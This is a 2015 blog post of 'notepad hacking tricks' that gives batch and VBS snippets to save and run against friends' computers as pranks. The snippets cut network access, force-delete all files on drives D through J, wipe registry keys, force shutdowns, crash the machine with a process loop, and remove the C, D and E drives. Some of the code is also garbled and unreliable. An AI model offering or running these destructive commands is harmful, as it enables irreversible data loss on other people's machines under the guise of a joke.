Search This Blog

Monday, October 5, 2015

Some dangerous notepad hacking tricks

Some dangerous notepad hacking tricks
How to make some virus in notepad:

1.Open notepad.
2.copy the codes given below.
3.save it with correct extensions.
4.Open the saved files.
5.Done.


 No Internet Access


A good Halloween prank for your friends this stops internet access of the user. To gain Access type IPconfig /renew in CMD

        @echo off
        Ipconfig /release

Deletes every thing in the computers drive.


 @echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
save as "your file name.bat"

    Registry Deleter


Deletes everything stored in registry

    @echo OFF
    START reg delete HKCR/.exe
    START reg delete HKCR/.dll
    START reg delete HKCR/*

   

    Shut Up


Send your friend a little message and shut down his computer

    @echo off
    msg * Lets Roll Baby
    shutdown -c “Error! Yor computer got giguled!” -s

    Crash Puter


This is simple virus that crashes the computer – [Save As Anything.VBS]

    Option Explicit
    Dim WSHShell
    Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
    Dim x
    For x = 1 to 100000000
    WSHShell.Run “Tourstart.exe”
    Next

    Ez Formatter

This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C drives.


    rd/s/q D:\
    rd/s/q C:\
    rd/s/q E:\

  

No comments:

Post a Comment